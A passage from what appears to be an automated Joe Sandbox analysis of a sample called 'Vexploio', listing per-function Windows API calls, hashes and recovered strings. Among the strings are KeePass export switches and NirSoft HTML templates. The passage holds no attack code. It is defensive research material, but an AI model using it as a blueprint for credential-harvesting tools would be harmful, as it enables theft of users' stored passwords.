                              • memset.MSVCRT ref: 004085F1
                              • memset.MSVCRT ref: 00408606
                              • strcmp.MSVCRT ref: 00408645
                              • _mbscpy.MSVCRT ref: 004086DB
                              • _mbscpy.MSVCRT ref: 004086FA
                              • memset.MSVCRT ref: 0040870E
                              • strcmp.MSVCRT ref: 0040876B
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                              • String ID: ---
                              • API String ID: 3437578500-2854292027
                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                              APIs
                              • memset.MSVCRT ref: 0041087D
                              • memset.MSVCRT ref: 00410892
                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                              • GetSysColor.USER32(0000000F), ref: 00410999
                              • DeleteObject.GDI32(?), ref: 004109D0
                              • DeleteObject.GDI32(?), ref: 004109D6
                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                              • String ID:
                              • API String ID: 1010922700-0
                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                              APIs
                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                              • malloc.MSVCRT ref: 004186B7
                              • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                              • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                              • malloc.MSVCRT ref: 004186FE
                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                              • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                              • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                              • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$FullNamePath$malloc$Version
                              • String ID: |A
                              • API String ID: 4233704886-1717621600
                              • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                              • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                              • API String ID: 2081463915-1959339147
                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                              APIs
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                              • API String ID: 2012295524-70141382
                              • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                              • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$HandleModule
                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                              • API String ID: 667068680-3953557276
                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                              APIs
                              • GetDC.USER32(00000000), ref: 004121FF
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                              • SelectObject.GDI32(?,?), ref: 00412251
                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                              • SetCursor.USER32(00000000), ref: 004122BC
                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                              • memcpy.MSVCRT ref: 0041234D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                              • String ID:
                              • API String ID: 1700100422-0
                              • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                              • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004111E0
                              • GetWindowRect.USER32(?,?), ref: 004111F6
                              • GetWindowRect.USER32(?,?), ref: 0041120C
                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                              • GetWindowRect.USER32(00000000), ref: 0041124D
                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                              • String ID:
                              • API String ID: 552707033-0
                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                              • memcpy.MSVCRT ref: 0040C11B
                              • strchr.MSVCRT ref: 0040C140
                              • strchr.MSVCRT ref: 0040C151
                              • _strlwr.MSVCRT ref: 0040C15F
                              • memset.MSVCRT ref: 0040C17A
                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                              • String ID: 4$h
                              • API String ID: 4066021378-1856150674
                              • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                              • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$_snwprintf
                              • String ID: %%0.%df
                              • API String ID: 3473751417-763548558
                              • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                              • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                              APIs
                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                              • KillTimer.USER32(?,00000041), ref: 004060D7
                              • KillTimer.USER32(?,00000041), ref: 004060E8
                              • GetTickCount.KERNEL32 ref: 0040610B
                              • GetParent.USER32(?), ref: 00406136
                              • SendMessageW.USER32(00000000), ref: 0040613D
                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                              • String ID: A
                              • API String ID: 2892645895-3554254475
                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                              APIs
                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                              • GetDesktopWindow.USER32 ref: 0040D9FD
                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                              • memset.MSVCRT ref: 0040DA23
                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                              • String ID: caption
                              • API String ID: 973020956-4135340389
                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                              APIs
                              Strings
                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$_snwprintf$wcscpy
                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                              • API String ID: 1283228442-2366825230
                              • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                              • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                              APIs
                              • wcschr.MSVCRT ref: 00413972
                              • wcscpy.MSVCRT ref: 00413982
                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                              • wcscpy.MSVCRT ref: 004139D1
                              • wcscat.MSVCRT ref: 004139DC
                              • memset.MSVCRT ref: 004139B8
                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                              • memset.MSVCRT ref: 00413A00
                              • memcpy.MSVCRT ref: 00413A1B
                              • wcscat.MSVCRT ref: 00413A27
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                              • String ID: \systemroot
                              • API String ID: 4173585201-1821301763
                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscpy
                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                              • API String ID: 1284135714-318151290
                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                              • String ID: 0$6
                              • API String ID: 4066108131-3849865405
                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                              APIs
                              • memset.MSVCRT ref: 004082EF
                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                              • memset.MSVCRT ref: 00408362
                              • memset.MSVCRT ref: 00408377
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$ByteCharMultiWide
                              • String ID:
                              • API String ID: 290601579-0
                              • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                              • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memchrmemset
                              • String ID: PD$PD
                              • API String ID: 1581201632-2312785699
                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
